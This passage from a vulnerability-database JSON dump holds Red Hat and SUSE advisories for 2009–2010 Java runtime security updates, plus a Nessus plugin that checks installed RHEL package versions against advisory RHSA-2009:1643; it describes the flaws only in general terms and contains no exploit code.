5 Runtime Environment and\nthe Sun Java 5 Software Development Kit.\n\nThis update fixes several vulnerabilities in the Sun Java 5 Runtime\nEnvironment and the Sun Java 5 Software Development Kit. These\nvulnerabilities are summarized on the \"Advance notification of Security\nUpdates for Java SE\" page from Sun Microsystems, listed in the References\nsection. (CVE-2009-2409, CVE-2009-3728, CVE-2009-3873, CVE-2009-3876,\nCVE-2009-3877, CVE-2009-3879, CVE-2009-3880, CVE-2009-3881, CVE-2009-3882,\nCVE-2009-3883, CVE-2009-3884)\n\nNote: This is the final update for the java-1.5.0-sun packages, as the Sun\nJava SE Release family 5.0 has now reached End of Service Life. The next\nupdate will remove the java-1.5.0-sun packages.\n\nAn alternative to Sun Java SE 5.0 is the Java 2 Technology Edition of the\nIBM Developer Kit for Linux, which is available from the Extras and\nSupplementary channels on the Red Hat Network. For users of applications\nthat are capable of using the Java 6 runtime, the OpenJDK open source JDK\nis included in Red Hat Enterprise Linux 5 (since 5.3) and is supported by\nRed Hat.\n\nUsers of java-1.5.0-sun should upgrade to these updated packages, which\ncorrect these issues. All running instances of Sun Java must be restarted\nfor the update to take effect.", "modified": "2017-07-27T02:00:51", "published": "2009-11-10T05:00:00", "id": "RHSA-2009:1571", "href": "https://access.redhat.com/errata/RHSA-2009:1571", "type": "redhat", "title": "(RHSA-2009:1571) Critical: java-1.5.0-sun security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:32:39", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5349", "CVE-2009-1100", "CVE-2009-2625", "CVE-2009-3868", "CVE-2009-3872", "CVE-2009-3873", "CVE-2009-3876", "CVE-2009-3877"], "description": "The IBM 1.4.2 SR13-FP2 Java release includes the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit.\n\nThis update fixes two vulnerabilities in the IBM Java 2 Runtime Environment\nand the IBM Java 2 Software Development Kit. These vulnerabilities are\nsummarized on the IBM \"Security alerts\" page listed in the References\nsection. (CVE-2008-5349, CVE-2009-2625)\n\nWarning: Do not install these java-1.4.2-ibm packages for SAP alongside the\njava-1.4.2-ibm packages from the Red Hat Enterprise Linux Extras or\nSupplementary channels on the Red Hat Network. Doing so could cause your\nsystem to fail to update cleanly, among other possible problems.\n\nAll users of java-1.4.2-ibm for Red Hat Enterprise Linux 4 and 5 for SAP\nare advised to upgrade to these updated packages, which contain the IBM\n1.4.2 SR13-FP2 Java release. All running instances of IBM Java must be\nrestarted for this update to take effect.", "modified": "2017-09-08T12:16:44", "published": "2009-11-04T05:00:00", "id": "RHSA-2009:1551", "href": "https://access.redhat.com/errata/RHSA-2009:1551", "type": "redhat", "title": "(RHSA-2009:1551) Moderate: java-1.4.2-ibm security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T14:34:13", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2409", "CVE-2009-3728", "CVE-2009-3729", "CVE-2009-3865", "CVE-2009-3866", "CVE-2009-3867", "CVE-2009-3868", "CVE-2009-3869", "CVE-2009-3871", "CVE-2009-3872", "CVE-2009-3873", "CVE-2009-3874", "CVE-2009-3875", "CVE-2009-3876", "CVE-2009-3877", "CVE-2009-3879", "CVE-2009-3880", "CVE-2009-3881", "CVE-2009-3882", "CVE-2009-3883", "CVE-2009-3884", "CVE-2009-3886"], "description": "The Sun 1.6.0 Java release includes the Sun Java 6 Runtime Environment and\nthe Sun Java 6 Software Development Kit.\n\nThis update fixes several vulnerabilities in the Sun Java 6 Runtime\nEnvironment and the Sun Java 6 Software Development Kit. These\nvulnerabilities are summarized on the \"Advance notification of Security\nUpdates for Java SE\" page from Sun Microsystems, listed in the References\nsection. (CVE-2009-2409, CVE-2009-3728, CVE-2009-3729, CVE-2009-3865,\nCVE-2009-3866, CVE-2009-3867, CVE-2009-3868, CVE-2009-3869, CVE-2009-3871,\nCVE-2009-3872, CVE-2009-3873, CVE-2009-3874, CVE-2009-3875, CVE-2009-3876,\nCVE-2009-3877, CVE-2009-3879, CVE-2009-3880, CVE-2009-3881, CVE-2009-3882,\nCVE-2009-3883, CVE-2009-3884, CVE-2009-3886)\n\nUsers of java-1.6.0-sun should upgrade to these updated packages, which\ncorrect these issues. All running instances of Sun Java must be restarted\nfor the update to take effect.", "modified": "2017-07-27T02:00:37", "published": "2009-11-09T05:00:00", "id": "RHSA-2009:1560", "href": "https://access.redhat.com/errata/RHSA-2009:1560", "type": "redhat", "title": "(RHSA-2009:1560) Critical: java-1.6.0-sun security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:28", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2409", "CVE-2009-3728", "CVE-2009-3869", "CVE-2009-3871", "CVE-2009-3873", "CVE-2009-3874", "CVE-2009-3875", "CVE-2009-3876", "CVE-2009-3877", "CVE-2009-3879", "CVE-2009-3880", "CVE-2009-3881", "CVE-2009-3882", "CVE-2009-3883", "CVE-2009-3884"], "description": "These packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit. The Java Runtime Environment (JRE)\ncontains the software and tools that users need to run applications written\nusing the Java programming language.\n\nAn integer overflow flaw and buffer overflow flaws were found in the way\nthe JRE processed image files. An untrusted applet or application could use\nthese flaws to extend its privileges, allowing it to read and write local\nfiles, as well as to execute local applications with the privileges of the\nuser running the applet or application. (CVE-2009-3869, CVE-2009-3871,\nCVE-2009-3873, CVE-2009-3874)\n\nAn information leak was found in the JRE. An untrusted applet or\napplication could use this flaw to extend its privileges, allowing it to\nread and write local files, as well as to execute local applications with\nthe privileges of the user running the applet or application. (CVE-2009-3881)\n\nIt was discovered that the JRE still accepts certificates with MD2 hash\nsignatures, even though MD2 is no longer considered a cryptographically\nstrong algorithm. This could make it easier for an attacker to create a\nmalicious certificate that would be treated as trusted by the JRE. With\nthis update, the JRE disables the use of the MD2 algorithm inside\nsignatures by default. (CVE-2009-2409)\n\nA timing attack flaw was found in the way the JRE processed HMAC digests.\nThis flaw could aid an attacker using forged digital signatures to bypass\nauthentication checks. (CVE-2009-3875)\n\nTwo denial of service flaws were found in the JRE. These could be exploited\nin server-side application scenarios that process DER-encoded\n(Distinguished Encoding Rules) data. (CVE-2009-3876, CVE-2009-3877)\n\nAn information leak was found in the way the JRE handled color profiles. An\nattacker could use this flaw to discover the existence of files outside of\nthe color profiles directory. (CVE-2009-3728)\n\nA flaw in the JRE with passing arrays to the X11GraphicsDevice API was\nfound. An untrusted applet or application could use this flaw to access and\nmodify the list of supported graphics configurations. This flaw could also\nlead to sensitive information being leaked to unprivileged code.\n(CVE-2009-3879)\n\nIt was discovered that the JRE passed entire objects to the logging API.\nThis could lead to sensitive information being leaked to either untrusted\nor lower-privileged code from an attacker-controlled applet which has\naccess to the logging API and is therefore able to manipulate (read and/or\ncall) the passed objects. (CVE-2009-3880)\n\nPotential information leaks were found in various mutable static variables.\nThese could be exploited in application scenarios that execute untrusted\nscripting code. (CVE-2009-3882, CVE-2009-3883)\n\nAn information leak was found in the way the TimeZone.getTimeZone method\nwas handled. This method could load time zone files that are outside of the\n[JRE_HOME]/lib/zi/ directory, allowing a remote attacker to probe the local\nfile system. (CVE-2009-3884)\n\nNote: The flaws concerning applets in this advisory, CVE-2009-3869,\nCVE-2009-3871, CVE-2009-3873, CVE-2009-3874, CVE-2009-3879, CVE-2009-3880,\nCVE-2009-3881 and CVE-2009-3884, can only be triggered in\njava-1.6.0-openjdk by calling the \"appletviewer\" application.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect.", "modified": "2017-09-08T12:07:09", "published": "2009-11-16T05:00:00", "id": "RHSA-2009:1584", "href": "https://access.redhat.com/errata/RHSA-2009:1584", "type": "redhat", "title": "(RHSA-2009:1584) Important: java-1.6.0-openjdk security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T11:45:32", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2493", "CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "description": "IBM Java 5 was updated to Service Refresh 11. It fixes lots of bugs and security issues.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2010-01-12T09:21:12", "published": "2010-01-12T09:21:12", "id": "SUSE-SA:2010:002", "href": "http://lists.opensuse.org/opensuse-security-announce/2010-01/msg00001.html", "type": "suse", "title": "remote code execution in java-1_5_0-ibm", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:40:22", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0217", "CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3866", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3865", "CVE-2009-3877", "CVE-2009-3868"], "description": "IBM Java 6 was updated to Service Refresh 7.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2010-01-12T17:47:21", "published": "2010-01-12T17:47:21", "id": "SUSE-SA:2010:004", "href": "http://lists.opensuse.org/opensuse-security-announce/2010-01/msg00004.html", "title": "remote code execution in java-1_6_0-ibm", "type": "suse", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:20:17", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3866", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3865", "CVE-2009-3877", "CVE-2009-3864", "CVE-2009-3868"], "description": "The Sun Java 6 SDK/JRE was updated to u17 update fixing bugs and various security issues:\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2009-11-19T17:02:05", "published": "2009-11-19T17:02:05", "id": "SUSE-SA:2009:058", "href": "http://lists.opensuse.org/opensuse-security-announce/2009-11/msg00010.html", "title": "remote code execution in java-1_6_0-sun", "type": "suse", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:42:11", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871"], "description": "IBM Java 1.4.2 was updated to 13 FP3.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2010-01-12T17:42:00", "published": "2010-01-12T17:42:00", "id": "SUSE-SA:2010:003", "href": "http://lists.opensuse.org/opensuse-security-announce/2010-01/msg00003.html", "title": "remote code execution in java-1_4_2-ibm", "type": "suse", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-17T13:07:16", "description": "Updated java-1.4.2-ibm packages that fix several security issues are\nnow available for Red Hat Enterprise Linux 3 Extras, Red Hat\nEnterprise Linux 4 Extras, and Red Hat Enterprise Linux 5\nSupplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nThe IBM 1.4.2 SR13-FP3 Java release includes the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM 'Security alerts' page\nlisted in the References section. (CVE-2009-3867, CVE-2009-3868,\nCVE-2009-3869, CVE-2009-3871, CVE-2009-3872, CVE-2009-3873,\nCVE-2009-3874, CVE-2009-3875, CVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.4.2-ibm are advised to upgrade to these updated\npackages, which contain the IBM 1.4.2 SR13-FP3 Java release. All\nrunning instances of IBM Java must be restarted for this update to\ntake effect.", "edition": 29, "published": "2009-12-08T00:00:00", "title": "RHEL 3 / 4 / 5 : java-1.4.2-ibm (RHSA-2009:1643)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2010-0079", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "modified": "2009-12-08T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:3", "cpe:/o:redhat:enterprise_linux:4", "p-cpe:/a:redhat:enterprise_linux:java-1.4.2-ibm-plugin", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:java-1.4.2-ibm", "p-cpe:/a:redhat:enterprise_linux:java-1.4.2-ibm-devel", "cpe:/o:redhat:enterprise_linux:4.8", "p-cpe:/a:redhat:enterprise_linux:java-1.4.2-ibm-jdbc", "p-cpe:/a:redhat:enterprise_linux:java-1.4.2-ibm-javacomm", "p-cpe:/a:redhat:enterprise_linux:java-1.4.2-ibm-src", "cpe:/o:redhat:enterprise_linux:5.4", "p-cpe:/a:redhat:enterprise_linux:java-1.4.2-ibm-demo"], "id": "REDHAT-RHSA-2009-1643.NASL", "href": "https://www.tenable.com/plugins/nessus/43048", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:1643. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43048);\n script_version(\"1.35\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\", \"CVE-2010-0079\");\n script_bugtraq_id(36881);\n script_xref(name:\"RHSA\", value:\"2009:1643\");\n\n script_name(english:\"RHEL 3 / 4 / 5 : java-1.4.2-ibm (RHSA-2009:1643)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated java-1.4.2-ibm packages that fix several security issues are\nnow available for Red Hat Enterprise Linux 3 Extras, Red Hat\nEnterprise Linux 4 Extras, and Red Hat Enterprise Linux 5\nSupplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nThe IBM 1.4.2 SR13-FP3 Java release includes the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM 'Security alerts' page\nlisted in the References section. (CVE-2009-3867, CVE-2009-3868,\nCVE-2009-3869, CVE-2009-3871, CVE-2009-3872, CVE-2009-3873,\nCVE-2009-3874, CVE-2009-3875, CVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.4.2-ibm are advised to upgrade to these updated\npackages, which contain the IBM 1.4.2 SR13-FP3 Java release. All\nrunning instances of IBM Java must be restarted for this update to\ntake effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3867\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3868\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3869\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3871\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3872\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3873\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3874\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3875\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3876\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3877\"\n );\n # http://www.ibm.com/developerworks/java/jdk/alerts/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://developer.ibm.com/javasdk/support/security-vulnerabilities/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2009:1643\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java JRE AWT setDiffICM Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119, 189, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.4.2-ibm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.4.2-ibm-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.4.2-ibm-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.4.2-ibm-javacomm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.4.2-ibm-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.4.2-ibm-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.4.2-ibm-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/11/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(3|4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 3.x / 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2009:1643\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL3\", reference:\"java-1.4.2-ibm-1.4.2.13.3-1jpp.1.el3\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"java-1.4.2-ibm-demo-1.4.2.13.3-1jpp.1.el3\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"java-1.4.2-ibm-devel-1.4.2.13.3-1jpp.1.el3\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", cpu:\"i386\", reference:\"java-1.4.2-ibm-jdbc-1.4.2.13.3-1jpp.1.el3\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", cpu:\"s390\", reference:\"java-1.4.2-ibm-jdbc-1.4.2.13.3-1jpp.1.el3\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", cpu:\"i386\", reference:\"java-1.4.2-ibm-plugin-1.4.2.13.3-1jpp.1.el3\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"java-1.4.2-ibm-src-1.4.2.13.3-1jpp.1.el3\")) flag++;\n\n\n if (rpm_check(release:\"RHEL4\", reference:\"java-1.4.2-ibm-1.4.2.13.3-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"java-1.4.2-ibm-demo-1.4.2.13.3-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"java-1.4.2-ibm-devel-1.4.2.13.3-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"java-1.4.2-ibm-javacomm-1.4.2.13.3-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"java-1.4.2-ibm-javacomm-1.4.2.13.3-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"java-1.4.2-ibm-jdbc-1.4.2.13.3-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"s390\", reference:\"java-1.4.2-ibm-jdbc-1.4.2.13.3-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"java-1.4.2-ibm-plugin-1.4.2.13.3-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"java-1.4.2-ibm-src-1.4.2.13.3-1jpp.1.el4\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", reference:\"java-1.4.2-ibm-1.4.2.13.3-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"java-1.4.2-ibm-demo-1.4.2.13.3-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"java-1.4.2-ibm-devel-1.4.2.13.3-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.4.2-ibm-javacomm-1.4.2.13.3-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.4.2-ibm-javacomm-1.4.2.13.3-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.4.2-ibm-jdbc-1.4.2.13.3-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390\", reference:\"java-1.4.2-ibm-jdbc-1.4.2.13.3-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.4.2-ibm-plugin-1.4.2.13.3-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"java-1.4.2-ibm-src-1.4.2.13.3-1jpp.1.el5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.4.2-ibm / java-1.4.2-ibm-demo / java-1.4.2-ibm-devel / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:44:38", "description": "IBM Java 5 was updated to Service Refresh 11. It fixes lots of bugs\nand security issues.\n\nThe timezone update to 1.6.9s (with the latest Fiji change).\n\n - A vulnerability in the Java Runtime Environment with\n decoding DER encoded data might allow a remote client to\n cause the JRE to crash, resulting in a denial of service\n condition. (CVE-2009-3876 / CVE-2009-3877)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment audio system might allow an untrusted applet\n or Java Web Start application to escalate privileges.\n For example, an untrusted applet might grant itself\n permissions to read and write local files, or run local\n applications that are accessible to the user running the\n untrusted applet. (CVE-2009-3867)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with parsing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3868)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with reading JPEG files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3872)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing JPEG files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3873)\n\n - A security vulnerability in the Java Runtime Environment\n with verifying HMAC digests might allow authentication\n to be bypassed. This action can allow a user to forge a\n digital signature that would be accepted as valid.\n Applications that validate HMAC-based digital signatures\n might be vulnerable to this type of attack.\n (CVE-2009-3875)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3869)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3871)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with processing JPEG images might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3874)\n\n - The Java Runtime Environment includes the Java Web Start\n technology that uses the Java Web Start ActiveX control\n to launch Java Web Start in Internet Explorer. A\n security vulnerability in the Active Template Library\n (ATL) in various releases of Microsoft Visual Studio,\n which is used by the Java Web Start ActiveX control,\n might allow the Java Web Start ActiveX control to be\n leveraged to run arbitrary code. This might occur as the\n result of a user of the Java Runtime Environment viewing\n a specially crafted web page that exploits this\n vulnerability. (CVE-2009-2493)\n\nPlease also see http://www.ibm.com/developerworks/java/jdk/alerts/", "edition": 24, "published": "2010-10-11T00:00:00", "title": "SuSE 10 Security Update : IBM Java 1.5.0 (ZYPP Patch Number 6741)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2493", "CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", 